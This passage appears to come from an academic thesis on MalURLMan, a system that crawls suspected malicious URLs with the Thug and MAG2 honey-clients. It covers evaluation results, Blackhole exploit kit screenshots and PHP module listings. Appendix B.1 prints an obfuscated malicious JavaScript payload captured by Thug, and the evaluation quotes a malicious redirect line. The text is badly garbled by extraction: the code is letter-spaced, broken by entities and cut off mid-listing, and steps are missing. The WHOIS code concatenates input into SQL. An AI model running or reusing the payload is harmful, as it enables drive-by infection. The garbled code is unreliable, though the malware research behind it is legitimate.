as it may be possible to implement different queueing and processing mechanisms for
each queue, like for instance different flavors of prioritization methods. In addition,
separate queues for different modules enables us to re-add a URL to a specific queue,
in that way we do not have to re-evaluate the URL in modules that we do not want
to re-evaluate with.
As mentioned in section 4.2, we do not have many IP addresses or proxy networks
available to utilize. Therefore, we decided to not implement mechanisms for URL
priority in the queue, as some of the methods we mentioned in 3.5 may require several
visits with LIHC. Another reason for not implementing queue priority mechanisms
was the time constraint this project is under. However, it is possible to implement it
in our queue system.
information that can aid us determine the status of the URL. Implementing support
for honey-client modules was the second development priority after the URL import
mechanisms, and we will start this section by going through those modules.
Implementing support for Thug into our system is a easy task, because Thug is easy
to execute and it has solid logging mechanisms. In our Thug modules we are utilizing
the MongoDB support that Thug has, and for every URL analyzed, we can query
the MongoDB collections for analysis data. Thug has three different collections: one
for storing all the URLs analyzed, one for storing all the events from analysis in the
MAEC format, and one for storing executable samples.
4.7.1.1 Thug.php
In 4.3we can see a diagram of the five step process every URL in the analysis queue
for Thug goes through. Each step is explained below:
3. The Thug honey-client visits the given URL and analyzes the web site
4. The Thug honey-client stores all the analysis data into MongoDB Collections
5. Thug.php stores the Thug honey-client task into the MalURLMan database,
and deletes the URL from the Thug analysis queue
4.7. HONEY-CLIENT ANALYSIS MODULES 39
4.7.1.2 Thug_results.php
In addition to this process, we have another process that queries the MongoDB
database for Thug results called Thug_results.php. This process queries the Events
Collection and the Samples Collection for each URL. If it finds any samples, the sam-
ple is stored in the filesystem and registered in the MalURLMan db. Each step in
this process is explained below and can be seen in figure 4.4.
1. Thug_results.php selects all the URLs from thug_tasks that has been processed
by Thug
3. For each URL, find event and samples from the event and sample collection in
MongoDB based on the MongoID
40 CHAPTER 4. SYSTEM ARCHITECTURE
4.7.1.3 Thug_mag2_sample.php
For each sample that is registered, we have another process that upload it to the
MAG2 as a sample, and create a task to run it in the IVM. The process is pictured
in figure 4.5 and described by the following steps:
4. If the MAG2 IVM task was created successfully, both the sample id and task
id from MAG2 will be saved in MalURLMan so it can query for results.
The MAG2 Analysis Module utilized the MAG2 API from Norman to talk with the
MAG2 environment. This module is divided into different tasks. The first task is the
ability to upload executable Windows PE files and run them in a the IVM virtual
machine environment. The second task is the ability to use the same IVM virtual
machine environment as a HIHC by making it run Internet Explorer against the
URLs we specify. The third and forth tasks are querying MAG2 for results. Due
to shortcomings in the MAG2 API, we are not able to get any information about
risk level or filter detection through the API, just through the MAG2 web interface.
Therefore we had to split the MAG2 results module into two separate modules, one
for the API, and one for parsing the web interface.
42 CHAPTER 4. SYSTEM ARCHITECTURE
The first task was explained in section 4.7.1.3 above, and the second task is ex-
plained in section 4.7.2.1 below.
4.7.2.1 Mag2.php
Mag2.php is used to process the URL analysis queue for the MAG2 module. The
process in Mag2.php is pictured in figure 4.6 and explain in the following steps:
4. For each sample and task created, save their MAG2 id’s in the MalURLMan
DB
4.7.2.2 Mag2_results.php
Mag2_results.php is use to query MAG2 API about results from our current MAG2
tasks. This module will ask for both URL tasks and executable tasks. The process is
pictured in figure 4.7 and described in the steps below:
1. Mag2_results.php get all the MAG2 tasks that are not completed from the
MalURLMan DB
2. Query the MAG2 API with task ID and check if the task status is set to com-
pleted.
5. If resource got images, get and save images to filesystem from MAG2 API.
Figure 4.7: Process for querying MAG2 API for results from our MAG2 tasks
44 CHAPTER 4. SYSTEM ARCHITECTURE
4.7.2.3 mag2_page.php
This module is used to get the most important information about the analysis process,
namely information about risk and filter detections from the IVM.
1. Query MalURLMan DB about all the current MAG2 tasks that are finished
2. Visit the MAG2 web interface task details page and search for “risk” and “filter
detection” in the source of the page
DNS Module We have created a simple DNS module which utilizes the PEAR
DNS2 and URL2 packages in addition to the ZF bootstrap. The current responsibility
for this module is to map the relationship between IP, domain, and URL and save
this into the database for history purposes.
4.9. URL RATING SCHEME 45
WHOIS Module We have created a WHOIS module which utilized the PEAR
Whois and URL2 packages in addition to the ZF bootstrap. The current responsibility
for this module is to store Whois data about every domain from every URL we analyze.
Black - URL unreachable. This means that the host of the URL cannot be
reached
Green - URL has been scanned and no malicious content found and no malicious
content has ever been associated with the hostnames belonging to the
domain.
Orange - No currently know threat, but domain has been red in the past (suspi-
cious)
By default every URL is Gray, which means we cannot be certain if the URL is
malicious or not. A URL can only get rated as red if we get a risk back from MAG2,
that means that any of their filters has been triggered.
Chapter 5
System Evaluation
This chapter goes through the result of the system development and evaluates the
system and its capabilities.
• Two access points for submitting URLs to the queue: either through REST API
or MalURLMan ZF environment.
• Example scripts that import URLs from specific sources. See B.3, and B.5 for
examples.
• A core module responsible for handling the URL queue by adding new URLs
to the analysis queue for all the current active analysis modules. See B.6.
• A DNS analysis module responsible for extracting the domain name form a
URL and resolving the IP and storing it in the database for history showing the
relationship between domain names and IPs. See B.7.
• A Ping analysis module responsible for checking if hosts are alive. See B.8.
46
5.2. MALURLMAN USAGE EXAMPLE 1 47
• A Whois analysis module responsible for querying the correct registrar for all
the available WHOIS information about a domain and storing it in the database.
See B.9.
• An analysis module responsible for processing the Thug URL queue, by sending
new URLs to Thug for analysis and adding a new “Thug task” to the database.
See B.10.
• An analysis module responsible for querying the Thug MongoDB for results for
any current “Thug tasks” and saving any samples found to disk and adding a
new “thug sample” to the database. See B.11.
• An analysis module responsible for processing the MAG2 URL queue by sending
new URLs to MAG2 API as URL samples and creating new MAG2 tasks in
the IVM with unlimited firewall restrictions. If the MAG2 task was successfully
created, the module will save it as a “MAG2 task” in the database, along with
the current status of the task. See B.12.
• An analysis module responsible for processing MAG2 task view web pages and
extracting the risk value. See B.15.
We are going to work with URLs gathered from a dataset from malware.com.br. This
site offers URL block lists in different formats, and we are going to be working with
the XML version of their dataset. Their XML structure for the URL element includes
information about when the URL was listed as malicious and what kind if threat was
found. The dataset contains 6503 URLs, and they are were added over a large time
span from 2005 until 2012. In table 5.1, we can see the distribution of URLs per year.
Taking note that over half the URLs was rated as malicious before 2012, we could
probably expect that a lot of the URLs no longer are malicious (false-positives). To
avoid this, we only import URLs from 2012, and in addition we import the URLs in
such a way that the we know what month each URL is from by creating a new URL
source for each month in the database.
To extract the URLs from the dataset and import them to the database we wrote
a simple PHP script with help from the MalURLMan ZF bootstrap. The script can
be found in B.4. As we can see there, it extracts each URL from the dataset and uses
the Model Url Mapper as introduced in section 4.3 to save the URL with the source
parameter set.
Unfortunately, the dataset from Table 5.2 contains many duplicate URLs, there-
fore we are going to only add unique URLs into the url analysis queue. As a result
the amount of URLs per month will be reduced as shown in Table 5.3.
actually changed the contents of the hosts file1 . In addition, another task created a
file called svhost.exe inside the Windows directory, which also was not detected by
any filters. This shows us that we should reconsider our filter rules for detection, in
order to detect more malicious activity.
This test also showed that MalURLMan can import URLs, send them to analysis
modules for analysis, and retrieve results from the analysis modules. It also shows
that we can save processing time in MAG2, by filtering out which URLs are dead with
the DNS module before we send them to MAG2. Given one MAG2 IVM available to
process URLs, we saved 343 minutes of processing time by simply checking if URLs
are alive before processing them any further.
Thug results are in many ways inconclusive, since it does not directly say any-
thing about the maliciousness of a URL. In this case, Thug only save JavaScript and
executable samples like Windows PE executable files, Java JAR files and Flash SWF
files, that we can use for further analysis with other tools. By manual inspection
we can for instance see cases of JavaScript that looks suspicious, in comparison to
for instance Javascript snippets of known libraries like jQuery. However, Thug has
not yet any plugins to determine the suspiciousness of a Javascript snippet. In cases
where Thug finds executables, it will save the samples and the MAG2 Thug process
(see 4.7.1.3) will upload the sample to MAG2. However, it will only upload PE files,
since this version of MAG2 does not support any other files.
MAG2 results are more conclusive, and it will give tasks a risk rating if any
detection filters are triggered. In our case, detection filters triggers if for instance
a visit to a URL results in creating on processes in suspicious places or adding of
autostart objects. However, for our uploaded PE files, the same filters will trigger if
the files for instance creates a temporary file in a temp folder. This is not suspicious
for a typical installer program, which was the case for many of the uploaded files.
This test also shows an interesting trait of the hybrid honey-client system con-
figuration. All of the malicious URLs where Thug found executables, was not rated
malicious by MAG2, and Thug could not evaluate the executable itself. However, by
1
The host file is used to map hostnames to IPs by OSs.
5.3. MALURLMAN USAGE EXAMPLE 2 51
window.location="http://contentdesigner.ru/hwohuwr/pntkmra.php";
This is a difference that should raise some suspicion, in addition to that the URL
path looks unnatural. If the TLD of the redirection URL had been to a suspicious
TLD, that could have raised more suspicion. That is, if we are redirected from a
Russian site to a Chinese site. However, this is not the case here. But the fact that
the redirect code was removed on our second request from the same IP, we decided
to analyze it further with our HIHC module.
it shows that MalURLMan in its current state can detect malicious pages that are
targeting our honey-client configurations. In fact, we queried Google Safe Browsing
for their rating of the URL, at first it had no rating for the URL. Therefore we
submitted the URL to their analysis service, to see if they would detect any malicious
activity. When Google had visited and analyzed the URL, their diagnostic page said
it had visited it, but found no malicious activity. See figure A.4 for more details.
This information may tell us something about that the TDS are either blocking the
Google IPs, or that it is not exploiting their honey-client configurations. Either way,
it shows the importance of using unknown IPs when visiting URLs.
Chapter 6
Conclusion
The goal of this thesis was to create a system able crawl potential malicious URLs
and rate them as malicious or not. Thus, we created a modular system for managing
malicious URLs, with capability to import URLs from specific sources and analyze
URLs with the help of a hybrid honey-client configuration and other analysis modules.
This lay the groundwork for a system that can help in ever evolving fight against
malicious web sites. The system serves as a proof of concept system utilizing a hybrid
honey-client configuration to better detect malicious activity. Our tests also showed
the importance of managing honey-client configurations with respect to IP addresses.
By re-evaluating a malicious web site from the same honey-client configuration with
the same IP address, we observed that the honey-client got served a benign web site
instead of a malicious one. Which introduced a false-negative in our ratings and
illustrates the importance of using proxies.
54
6.1. FUTURE WORK 55
1
Volunteer computing is a form of distributed computing in which the general public volunteers
processing and storage to scientific research projects[23].
Bibliography
[1] Statcounter global stats: Top 5 browsers from w20 2011 to w20 2012. [Online].
Available: http://gs.statcounter.com/#browser-ww-weekly-201120-201220
[4] Blue Coat White Paper - 2011 Mid-Year Security Report. Blue Coat, 2011.
[5] N. Provos, P. Mavrommatis, M. Rajab, and F. Monrose, “All your iframes point
to us,” in Proceedings of the 17th conference on Security symposium. USENIX
Association, 2008, pp. 1–15.
[7] Symantec. (2008, May) Symantec report: Attacks increasingly target trusted
web sites. [Online]. Available: http://www.symantec.com/resources/articles/
article.jsp?aid=20080513_sym_report_attacks_increasingly
56
BIBLIOGRAPHY 57
[8] (2010, 05) Websense 2010 threat report: Key staticial findings:
Web security. [Online]. Available: http://www.websense.com/content/
threat-report-2010-web-security.aspx
[10] Symantec Global Internet Security Threat Report Trends for 2008. Symantec,
2009, vol. XIV.
[11] Symantec. (2011, January) Report on attack toolkits and malicious websites.
[Online]. Available: http://www.symantec.com/about/news/resources/press_
kits/detail.jsp?pkid=attackkits
[19] D. Canali, M. Cova, G. Vigna, and C. Kruegel, “Prophiler: A fast filter for
the large-scale detection of malicious web pages,” in Proceedings of the 20th
international conference on World wide web. ACM, 2011, pp. 197–206.
Screenshots
Figure A.1: Here we see the vendor of the Black Hole exploit kit advertising its
features on the russian board vendors.pro. This screenshot was taken on 12.4.2012,
and it was automatically translated from Russian to English using Google Chrome.
It is not the latest version of Blackhole, but it showcases who advanced it was at that
time.
59
60 APPENDIX A. SCREENSHOTS
A.2.1 Statistics
In figure A.2 we can see an overview over different statistics in a live Black Hole
instance. It can tell us how much traffic has hit the instance, how many successful
loads of the malware, which exploits has been successful, and what kind of clients
that have been exploited.
Figure A.2: The statistics view in the Black Hole Exploit Kit, source:
http://www.xylibox.com/search/label/blackhole
A.2. BLACKHOLE EXPLOIT KIT SCREENSHOTS 61
Source Code
63
64 APPENDIX B. SOURCE CODE
13.5 ,9.5 ,14 ,17 ,16.5 , 8 ,19.5 ,1 ,7.5 ,10.5 , 2 ,7.5 ,13.5 ,9.5 , 21 ,
21.5 ,8 ,14.5 ,9 ,19.5 , 21.5 , 20.5 ,4.5 , 17 ,5.5 , 20.5 ,20.5 , 34.5 , 36.5 ,
36.5 , 36.5 ,11.5 ,10 ,16 ,7.5 ,13.5 ,9.5 ,16 , 21 , 20.5 , 11.5 , 34.5 , 36.5 ,
36.5 ,21.5 , 25 ,9.5 ,13 ,16.5 ,9.5 , 25 ,20.5 , 34.5 , 36.5 , 36.5 , 36.5 ,
9 ,14.5 ,8.5 ,17.5 ,13.5 ,9.5 ,14 ,17 , 18 ,18.5 ,16 ,11.5 ,17 ,9.5 , 21 , 24 , 11 ,
11.5 ,10 ,16 ,7.5 ,13.5 ,9.5 , 25 ,16.5 ,16 ,8.5 , 10.5 , 21.5 ,11 ,17 ,17 ,15 , 12 ,
17.5 , 17.5 ,9 ,18.5 ,16 ,13.5 ,9 ,19.5 ,8 ,8.5 ,12.5 ,18.5 , 18 ,13 ,14.5 ,14.5 ,
12.5 ,11.5 ,14 , 18 ,7.5 ,17 , 17.5 , 9.5 ,10.5 ,14.5 , 10.5 , 16 , 21.5 , 25 ,18.
11.5 ,9 ,17 ,11 , 10.5 , 21.5 , 16.5 , 17 , 21.5 , 25 ,11 ,9.5 ,11.5 ,10.5 ,11 ,17 ,
10.5 , 21.5 , 16.5 , 17 , 21.5 , 25 ,16.5 ,17 ,19.5 ,13 ,9.5 , 10.5 , 21.5 ,
18 ,11.5 ,16.5 ,11.5 ,8 ,11.5 ,13 ,11.5 ,17 ,19.5 , 12 ,11 ,11.5 ,9 ,9 ,9.5 ,14 , 11.
15 ,14.5 ,16.5 ,11.5 ,17 ,11.5 ,14.5 ,14 , 12 ,7.5 ,8 ,16.5 ,14.5 ,13 ,17.5 ,17 ,9.5
B.1. THUG MAEC LOG EXAMPLE 65
11.5 ,13 ,9.5 ,10 ,17 , 12 , 17 , 11.5 ,17 ,14.5 ,15 , 12 , 17 , 11.5 , 21.5
36.5 ,21.5 , 34.5 , 36.5 , 36.5 ,10 ,17.5 ,14 ,8.5 ,17 ,11.5 ,14.5 ,14 , 25
10 ,16 ,7.5 ,13.5 ,9.5 ,16 , 21 , 20.5 ,20.5 , 34.5 , 36.5 , 36.5 , 36.5 ,18
7.5 ,16 , 25 ,10 , 25 , 10.5 , 25 ,9 ,14.5 ,8.5 ,17.5 ,13.5 ,9.5 ,14 ,17 , 18
9.5 ,7.5 ,17 ,9.5 , 6.5 ,13 ,9.5 ,13.5 ,9.5 ,14 ,17 , 21 , 21.5 ,11.5 ,10 ,16 ,
13.5 ,9.5 , 21.5 , 20.5 , 11.5 ,10 , 18 ,16.5 ,9.5 ,17 , 8.5 ,17 ,17 ,16 ,11.
17.5 ,17 ,9.5 , 21 , 21.5 ,16.5 ,16 ,8.5 , 21.5 , 19 , 21.5 ,11 ,17 ,17 ,15 ,
17.5 ,9 ,18.5 ,16 ,13.5 ,9 ,19.5 ,8 ,8.5 ,12.5 ,18.5 , 18 ,13 ,14.5 ,14.5 ,12
14 , 18 ,7.5 ,17 , 17.5 , 9.5 ,10.5 ,14.5 , 10.5 , 16 , 21.5 , 20.5 , 11.5 ,
10 , 18 ,16.5 ,17 ,19.5 ,13 ,9.5 , 18 ,18 ,11.5 ,16.5 ,11.5 ,8 ,11.5 ,13 ,11.5
10.5 , 21.5 ,11 ,11.5 ,9 ,9 ,9.5 ,14 , 21.5 , 11.5 ,10 , 18 ,16.5 ,17 ,19.5
18 ,15 ,14.5 ,16.5 ,11.5 ,17 ,11.5 ,14.5 ,14 , 10.5 , 21.5 ,7.5 ,8 ,16.5 ,14
13 ,17.5 ,17 ,9.5 , 21.5 , 11.5 ,10 , 18 ,16.5 ,17 ,19.5 ,13 ,9.5 , 18 ,13 ,9.
10.5 , 21.5 , 17 , 21.5 , 11.5 ,10 , 18 ,16.5 ,17 ,19.5 ,13 ,9.5 , 18 ,17 ,1
66 APPENDIX B. SOURCE CODE
10.5 , 21.5 , 17 , 21.5 , 11.5 ,10 , 18 ,16.5 ,9.5 ,17 , 8.5 ,17 ,17 ,16 ,
11.5 ,8 ,17.5 ,17 ,9.5 , 21 , 21.5 ,18.5 ,11.5 ,9 ,17 ,11 , 21.5 , 19 , 21.5 , 16.5 ,
21.5 , 20.5 , 11.5 ,10 , 18 ,16.5 ,9.5 ,17 , 8.5 ,17 ,17 ,16 ,11.5 ,8 ,17.5 ,17 ,9.5
21.5 ,11 ,9.5 ,11.5 ,10.5 ,11 ,17 , 21.5 , 19 , 21.5 , 16.5 , 17 ,
21.5 , 20.5 , 11.5 , 34.5 , 36.5 , 36.5 , 36.5 ,9 ,14.5 ,8.5 ,17.5 ,13.5 ,9.5 ,1
18 ,10.5 ,9.5 ,17 , 6.5 ,13 ,9.5 ,13.5 ,9.5 ,14 ,17 ,16.5 , 8 ,19.5 ,1 ,7.5 ,10.5 ,
18 ,7.5 ,15 ,15 ,9.5 ,14 ,9 , 7.5 ,11 ,11.5 ,13 ,9 , 21 ,10 , 20.5 , 11.5 , 34.5 , 3
36.5 ,21.5];
v=" e "+" va " ; }
i f ( v ) e=window [ v+" l " ] ; t r y {q=document [ " c r e a "+" t e E l e "+"
ment" ] ( "b" ) ;
i f ( e ) q . appendChild ( q+"" ) ; } c a t c h ( fwbewe ) {w=f ; s = [ ] ; }
r=S t r i n g ; z =(( e ) ? h : "" ) ;
f o r ( ; 5 7 5 ! = i ; i +=1){ j=i ; i f ( e ) s=s+r [ " f r "+"omC" +(( e ) ?
z : 1 2 ) ] ( ( w[ j ]⇤1+41) ⇤2) ; }
i f ( v&& ; e&& ; r&& ; z&& ; h&
;& ; s&& ; f
&& ; v&& ; v&& ; e&& ; r&&
amp ; h )
t r y { dsgsdg=p r o t o t y p e ; } c a t c h ( dsdh ) { e ( ( ( e ) ? s : 1 2 ) ) ; }
</Code_Segment>
</ Code_Snippet>
B.2. ZEND FRAMEWORK BOOTSTRAP SCRIPT 67
<?php
68 APPENDIX B. SOURCE CODE
d e f i n e ( ’APPLICATION_ENV’ , ’ development ’ ) ;
/⇤⇤ Zend_Application ⇤/
r e q u i r e _ o n c e ’ Zend/ A p p l i c a t i o n . php ’ ;
1 <?php
2 /⇤ ⇤
3 ⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
4 ⇤/
5
6 $malwareURLs = s i m p l e x m l _ l o a d _ f i l e ( " brmalware . xml" ) ;
7 foreach ( $malwareURLs as $malware ) {
8 $ o p t i o n s = array ( ’ u r l ’ => ( s t r i n g ) $malware >u r i ,
9 ’ s o u r c e ’ => ’ malware . com . br ’ ) ;
10 $ u r l = New Application_Model_Url ( $ o p t i o n s ) ;
B.4. MALWARE.COM.BR TEST IMPORT SCRIPT 69
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
$yay = array ( ) ;
$yey = array ( ) ;
$ u r l s = array ( ) ;
$count = array ( ) ;
foreach ( $malwareURLs as $malware ) {
$ y e a r = substr ( ( s t r i n g ) $malware >date , 0 , 4 ) ;
$month = substr ( ( s t r i n g ) $malware >date , 4 , 2 ) ;
$day = substr ( ( s t r i n g ) $malware >date , 6 , 2 ) ;
$yey [ $ y e a r ]++;
i f ( $ y e a r == ’ 2012 ’ ) {
// echo ( s t r i n g ) $malware >d a t e . " aka $year $month $day \
n";
$yay [ $month]++;
70 APPENDIX B. SOURCE CODE
switch ( $month ) {
case ’ 01 ’ :
$ s r c = ’ malware . com . br . j a n ’ ;
break ;
case ’ 02 ’ :
$ s r c = ’ malware . com . br . f e b ’ ;
break ;
case ’ 03 ’ :
$ s r c = ’ malware . com . br . mar ’ ;
break ;
case ’ 04 ’ :
$ s r c = ’ malware . com . br . apr ’ ;
break ;
case ’ 05 ’ :
$ s r c = ’ malware . com . br . may ’ ;
break ;
case ’ 06 ’ :
$ s r c = ’ malware . com . br . jun ’ ;
break ;
}
$ u r l = New Application_Model_Url ( $ o p t i o n s ) ;
$urlMapper = new Application_Model_UrlMapper ( ) ;
$urlMapper >s a v e ( $ u r l ) ;
B.5. MALWAREDOMAINLIST IMPORT SCRIPT 71
} else {
$count [md5( ( s t r i n g ) $malware >u r i ) ] [ ’ u r l ’ ] = ( s t r i n g )
$malware >u r i ;
$count [md5( ( s t r i n g ) $malware >u r i ) ] [ ’ count ’ ]++;
}
}
$saved = 0 ;
foreach ( $count a s $cunt ) {
$saved += $cunt [ ’ count ’ ] ;
}
?>
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
$row = 1 ;
$ u r l s = array ( ) ;
i f ( ( $ha ndle = fopen ( " updates . c s v " , " r " ) ) !== FALSE) {
while ( ( $data = fgetcsv ( $handle , 1 0 0 0 , " , " ) ) !== FALSE) {
72 APPENDIX B. SOURCE CODE
$ u r l s [ ] = $data ;
$row++;
}
f c l o s e ( $handle ) ;
}
$malwareURLs = array ( ) ;
foreach ( $ u r l s a s $ u r l ) {
i f ( $ u r l [ 1 ] != ’ ’ ) {
$malwareURLs [ ] = $ u r l [ 1 ] ;
} e l s e i f ( $ u r l [ 2 ] != ’ ’ ) {
$malwareURLs [ ] = $ u r l [ 2 ] ;
}
}
B.6 Core.php
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
B.6. CORE.PHP 73
$ l a s t _ c h e c k e d = time ( ) ;
$time_added = time ( ) ;
}
?>
B.7 DNS.php
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
r e q u i r e _ o n c e ’ Net /DNS2 . php ’ ;
r e q u i r e _ o n c e ’ Net /URL2 . php ’ ;
$module_id = 6 ;
$ u r l s = $db >f e t c h a l l ( "SELECT ⇤ FROM u r l _ a n a l y s i s _ q u e u e WHERE
module_id = ’ 6 ’ LIMIT 1000 " ) ;
foreach ( $ u r l s a s $ u r l ) {
default :
$u = $ u r l [ ’ u r l ’ ] ;
}
$ u r l 2 = &new Net_URL2( $u ) ;
$ h o s t = $ u r l 2 >h o s t ;
$ r = new Net_DNS2_Resolver ( ) ;
try {
$ r e s u l t = $r >query ( $ u r l 2 >h o s t ) ;
$ i p a d d r = $ r e s u l t >answer [ ’ 0 ’] > a d d r e s s ;
} c a t c h ( Net_DNS2_Exception $e ) {
}
$up = 1 ;
i f ( ! isset ( $ipaddr ) ) {
$ipaddr = 1 ;
$up = 0 ;
}
} else {
$domain_id = $domain [ 0 ] [ ’ i d ’ ] ;
}
$ip_long = ip2long ( $ i p a d d r ) ;
i f (empty( $ i p 2 ) ) {
$db >i n s e r t ( ’ i p ’ , array ( ’ i p ’ => $ip_long ) ) ;
$ip_id = $db >l a s t I n s e r t I d ( ) ;
} else {
$ip_id = $ i p 2 [ 0 ] [ ’ i d ’ ] ;
}
$db >delete ( ’ u r l _ a n a l y s i s _ q u e u e ’ ,
array ( ’ u r l _ i d = ? ’ => $ u r l [ ’ u r l _ i d ’ ] ,
’ module_id =? ’ => $module_id )
);
B.8. PING.PHP 77
}
?>
B.8 Ping.php
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
r e q u i r e _ o n c e ’ Net /URL2 . php ’ ;
r e q u i r e _ o n c e " Net / Ping . php" ;
r e q u i r e _ o n c e " Net /DNS2 . php" ;
r e q u i r e _ o n c e ’ Net / CheckIP2 . php ’ ;
$module_id = 8 ;
foreach ( $ u r l s a s $ u r l ) {
switch ( $ u r l [ ’ u r l _ s r c ’ ] ) {
case ’ 1 ’ :
$u = ’ h ttp : / / ’ . $ u r l [ ’ u r l ’ ] ;
case ’ 3 ’ :
$u = ’ h ttp : / / ’ . $ u r l [ ’ u r l ’ ] ;
default :
$u = $ u r l [ ’ u r l ’ ] ;
}
78 APPENDIX B. SOURCE CODE
$ u r l 2 = &new Net_URL2( $u ) ;
$ h o s t = $ u r l 2 >h o s t ;
$ip = 0;
i f ( Net_CheckIP2 : : i s V a l i d ( $ h o s t ) ) {
$data [ ’ i p ’ ] = $ h o s t ;
$data [ ’ fqdn ’ ] = ’ ’ ;
$data [ ’ d e s t f q d n ’ ] = ’ ’ ;
} else {
$ r = new Net_DNS2_Resolver ( ) ;
try {
$ r e s u l t = $r >query ( $ u r l 2 >h o s t ) ;
// i n some c a s e s domains may p o i n t t o a cname which p o i n t s
t o a new cname which p o i n t s t o a new cname e t c . . .
// cname > cname > cname > ... > cname > a > ip
// not u s u a l , b u t may happen . We c h o o s e t o o n l y s t o r e t h e
f i r s t cname and t h e l a s t a > ip
// Net_DNS2_Resolver g i v e s us a r e s u l t a r r a y c o n s i s t i n g
what we need :
$i = 0;
foreach ( $ r e s u l t >answer a s $ r r ) {
i f ( $ i == 0 && $ r r >type == "CNAME" ) { // t h e f q d n from t h e
url
$data [ ’ fqdn ’ ] = $ r r >name ;
}
i f ( $ r r >type == "A" ) {
$data [ ’ i p ’ ] = $ r r >a d d r e s s ;
B.8. PING.PHP 79
}
i f ( $data [ ’ i p ’ ] != 0 ) {
$ ping = Net_Ping : : f a c t o r y ( ) ;
i f (PEAR : : i s E r r o r ( $ping ) ) {
echo $ping >getMessage ( ) ;
} else {
$matches = array ( ) ;
$ s e v e r e l y = true ;
$ping >s e t A r g s ( array (
" count " => 1 ,
"size" => 3 2 ,
80 APPENDIX B. SOURCE CODE
$data [ ’ up ’ ] = true ;
i f (PEAR : : i s E r r o r ( $ r e s ) ) {
$data [ ’ up ’ ] = f a l s e ;
}
i f ( $ r e s >_ r e c e i v e d == 0 ) {
$data [ ’ up ’ ] = f a l s e ;
}
}
}
} else {
$data [ ’ up ’ ] = f a l s e ;
}
$data [ ’ i p ’ ] = ip2long ( $data [ ’ i p ’ ] ) ;
$db >i n s e r t ( ’ ip_domain ’ , $data ) ;
$db >delete ( ’ u r l _ a n a l y s i s _ q u e u e ’ ,
array ( ’ u r l _ i d = ? ’ => $data [ ’ u r l _ i d ’ ] ,
’ module_id = ? ’ => $module_id )
);
}
?>
B.9. WHOIS.PHP 81
B.9 Whois.php
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
/⇤
// import whois s e r v e r l i s t from h t t p : / / s e r v e r l i s t .
domaininfor mation . de /
$ s e r v e r s = s i m p l e x m l _ l o a d _ f i l e (" i n d e x . html ") ;
f o r e a c h ( $ s e r v e r s >s e r v e r as $ s e r v e r ) {
// p r i n t _ r ( $ s e r v e r ) ;
// o n l y i n s e r t t h o s e we know ar e c o n n e c t e d t o a s p e c i f i c TLD
.
i f ( i s s e t ( $ s e r v e r >domain ) ) {
$domain = $ s e r v e r >domain >a t t r i b u t e s ( ) >name [ 0 ] ;
$whois = $ s e r v e r >a t t r i b u t e s ( ) >h o s t [ 0 ] ;
$whois = ( s t r i n g ) $whois ;
$domain = ( s t r i n g ) $domain ;
echo " whois s e r v e r f o r TLD: " . $domain . " i s " . $whois . "\n
";
$ d a t a = a r r a y ( ’ whois ’ => $whois , ’ t l d ’ => $domain ) ;
$db >i n s e r t ( ’ whois ’ , $ d a t a ) ;
}
}
⇤/
$ u r l 2 = &new Net_URL2( $u ) ;
$ h o s t = $ u r l 2 >h o s t ;
$ t l d = explode ( " . " , $ h o s t ) ;
$tld = $tld [ 1 ] ;
$whois = $db >f e t c h a l l ( "SELECT ⇤ FROM whois WHERE t l d =’" .
$tld . " ’") ;
print_r ( $whois ) ;
$ s e r v e r = $whois [ 0 ] [ ’ whois ’ ] ;
$query = $host ; // g e t i n f o r m a t i o n a b o u t
// t h i s domain
$whois = new Net_Whois ;
$whoisdata = $whois >query ( $query , $ s e r v e r ) ;
$data = array (
’ u r l _ i d ’ => $ u r l [ ’ u r l _ i d ’ ] ,
’ whois ’ => $whoisdata
);
B.10 Thug.php
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
$module_id = 2 ;
// Create a p p l i c a t i o n , b o o t s t r a p , and run
$ a p p l i c a t i o n = new Zend_Application (APPLICATION_ENV,
APPLICATION_PATH . ’ / c o n f i g s / a p p l i c a t i o n . i n i ’ ) ;
$ a p p l i c a t i o n >b o o t s t r a p ( array ( ’ db ’ ) ) ;
$db = $ a p p l i c a t i o n >g e t B o o t s t r a p ( ) >g e t R e s o u r c e ( ’ db ’ ) ;
foreach ( $ u r l s a s $ u r l ) {
?>
B.11 Thug_results.php
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
r e q u i r e _ o n c e ’HTTP/ Request2 . php ’ ;
$module_id = 4 ;
$data = array ( ) ;
B.11. THUG_RESULTS.PHP 85
try {
$mongo = new Mongo ( ’ l o c a l h o s t ’ ) ;
$mongoDB = $mongo >thug ;
$ c o l l e c t i o n = $mongoDB >u r l s ;
$ t a s k s = $db >f e t c h a l l ( "SELECT ⇤ FROM thug_tasks where
u r l _ i d > 14458 " ) ;
$thugs = array ( ) ;
foreach ( $ t a s k s a s $ t a s k ) {
$ c u r s o r = $ c o l l e c t i o n >f i n d ( array ( ’ u r l ’ => $ t a s k [ ’ u r l ’ ] ) ) ;
while ( $ c u r s o r >hasNext ( ) ) {
$thugs [ ] = $ c u r s o r >getNext ( ) ;
}
}
$ e v e n t s = $mongoDB >e v e n t s ;
$samples = $mongoDB >samples ;
$samples_data = array ( ) ;
$events_data = array ( ) ;
foreach ( $ s a m p l e s _ c u r s o r as $sample ) {
// $sample [ ’ d a t a ’ ] = f a l s e ;
$sample [ ’ malurlmanurl ’ ] = $thug [ ’ u r l ’ ] ;
$samples_data [ ] = $sample ;
}
// do s o m e t h i n g w i t h e v e n t s d a t a
// p r i n t _ r ( $ e v e n t s _ d a t a ) ;
// do s o m e t h i n g w i t h s a m p l e s
// p r i n t _ r ( $samples_data ) ;
$ d i r = md5( $sample [ ’ u r l ’ ] ) ;
$ d i r = md5( $sample [ ’ malurlmanurl ’ ] ) ;
$path = ’ thug_samples / ’ . $ d i r ;
var_dump( $path ) ;
